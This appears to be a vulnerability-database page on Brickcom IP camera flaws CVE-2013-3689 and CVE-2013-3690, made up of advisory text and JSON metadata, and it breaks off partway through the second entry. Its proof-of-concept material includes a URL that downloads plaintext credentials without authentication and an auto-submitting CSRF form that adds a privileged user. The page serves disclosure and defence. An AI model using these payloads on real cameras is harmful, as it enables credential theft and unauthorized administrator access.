Vulnerabilites related to brickom - fb-100ap
var-201310-0207
Vulnerability from variot

Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP Cameras devices have security vulnerabilities that allow remote attackers to exploit vulnerabilities without having to verify direct commit requests for profile information. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================ BRICKCOM ==================================================================== ============================================================================

1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013

2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)

3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It\x92s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked.

4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\x92s not necessary any authentication.

http://xx.xx.xx.xx/configfile.dump?action=get

The most interesting parameters could be: UserSetSetting.userList.users[n\xba].password= *** UserSetSetting.userList.users[n\xba].name= ***

4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability

document.gobap.submit();

5.Credits -CVE-2013-3689 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3690 was discovered by Jon\xe1s Ropero Castillo.

6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0207",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "osd-040e",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "ob-100ae",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "wfb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "md-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "wcb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "fb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "md-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "wfb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "100ap device",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "brickom",
        "version": "3.0.6.16c1"
      },
      {
        "model": "osd-040e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "wcb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "ob-100ae",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "fb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "100-ap series",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "brickcom",
        "version": "3.0.6.16c1"
      },
      {
        "model": "100ap device",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "brickom",
        "version": "3.0.6.16c1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:brickom:100ap_device_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:fb-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:md-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:ob-100ae",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:osd-040e",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:wcb-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:wfb-100ap",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Eliezer Varad Lopez, Javier Repiso Snchez and Jons Ropero Castillo.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2013-3689",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-3689",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-07706",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-63691",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-3689",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-3689",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-07706",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201306-264",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-63691",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP Cameras devices have security vulnerabilities that allow remote attackers to exploit vulnerabilities without having to verify direct commit requests for profile information. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability. \nSuccessful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================\nBRICKCOM\n====================================================================\n============================================================================\n\n1.Advisory Information\nTitle: Brickcom 100ap Series Vulnerabilities\nDate Published: 12/06/2013\nDate of last updated: 12/06/2013\n\n2.Vulnerability Description\nMultiples vulnerabilities have been found in this device. \n-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)\n-CVE-2013-3690. Cross Site Request Forgery(CWE-352),  Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)\n\n3.Affected Products\nThe following products are affected by these vulnerabilities:\nFB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E\nIt\\x92s possible others models are affected but they were not checked. \n-CVE-2013-3689. \nWe have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1\nIn the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4\n-CVE-2013-3690. \nAll firmware checked. \n\n4.PoC\n4.1.Authentication Bypass \u0026 Clear Text Storage of Sensitive Information\nCVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\\x92s not necessary any authentication. \n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/configfile.dump?action=get\n_____________________________________________________________________________\n\nThe most interesting parameters could be:\nUserSetSetting.userList.users[n\\xba].password= ***\nUserSetSetting.userList.users[n\\xba].name= ***\n\n4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation\nCVE-2013-3690, CSRF is possible via POST method. \nAlso is possible a privilege escalation from a viewer user to an administrator user. \nA malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. \nThe following request can exploit this vulnerability\n_____________________________________________________________________________\n\u003chtml\u003e\n\u003cbody\u003e\n  \u003cform name=\"gobap\" action=\"http://xx.xx.xx.xx/cgi-bin/users.cgi\" method=\"POST\"\u003e\n    \u003cinput type=\"hidden\" name=\"action\" value=\"add\"\u003e\n    \u003cinput type=\"hidden\" name=\"index\" value=\"0\"\u003e\n    \u003cinput type=\"hidden\" name=\"username\" value=\"test2\"\u003e\n    \u003cinput type=\"hidden\" name=\"password\" value=\"test2\"\u003e\n    \u003cinput type=\"hidden\" name=\"privilege\" value=\"1\"\u003e\n    \u003cscript\u003edocument.gobap.submit();\u003c/script\u003e\n \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n_____________________________________________________________________________\n\n5.Credits\n-CVE-2013-3689 was discovered by Eliezer Varad\\xe9 Lopez, Javier Repiso S\\xe1nchez and Jon\\xe1s Ropero Castillo. \n-CVE-2013-3690 was discovered by Jon\\xe1s Ropero Castillo. \n\n6.Report Timeline\n-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. \n-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. \n(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)\n-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. \n-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "BID",
        "id": "60525"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-63691",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-3689",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "60525",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706",
        "trust": 0.6
      },
      {
        "db": "FULLDISC",
        "id": "20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "122003",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "BID",
        "id": "60525"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "id": "VAR-201310-0207",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      }
    ],
    "trust": 1.3666667
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:16:43.910000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.brickcom.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://seclists.org/fulldisclosure/2013/jun/84"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3689"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3689"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/60525"
      },
      {
        "trust": 0.1,
        "url": "http://xx.xx.xx.xx/configfile.dump?action=get"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3689"
      },
      {
        "trust": 0.1,
        "url": "http://xx.xx.xx.xx/cgi-bin/users.cgi\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "db": "BID",
        "id": "60525"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-06-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "date": "2013-10-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "date": "2013-06-13T00:00:00",
        "db": "BID",
        "id": "60525"
      },
      {
        "date": "2013-10-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "date": "2013-06-13T06:08:04",
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "date": "2013-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "date": "2013-10-04T23:55:03.970000",
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-08-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "date": "2013-10-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-63691"
      },
      {
        "date": "2013-06-13T00:00:00",
        "db": "BID",
        "id": "60525"
      },
      {
        "date": "2013-10-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004513"
      },
      {
        "date": "2013-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      },
      {
        "date": "2024-11-21T01:54:07.927000",
        "db": "NVD",
        "id": "CVE-2013-3689"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Brickcom Multiple IP Cameras Information Disclosure Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07706"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-264"
      }
    ],
    "trust": 0.6
  }
}

var-201310-0208
Vulnerability from variot

Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users. Brickcom IP Cameras are IP camera devices. A cross-site request forgery vulnerability exists in the Brickcom IP Cameras WEB interface. Allows an attacker to build a malicious URI, entice a user to resolve, and can be used to boost user permissions. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. Brickcom FB-100Ap and so on are network camera products of Brickcom. The following models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================ BRICKCOM ==================================================================== ============================================================================

1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013

2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)

3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It\x92s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked.

4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\x92s not necessary any authentication.

http://xx.xx.xx.xx/configfile.dump?action=get

The most interesting parameters could be: UserSetSetting.userList.users[n\xba].password= *** UserSetSetting.userList.users[n\xba].name= ***

4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability

document.gobap.submit();

5.Credits -CVE-2013-3689 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3690 was discovered by Jon\xe1s Ropero Castillo.

6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
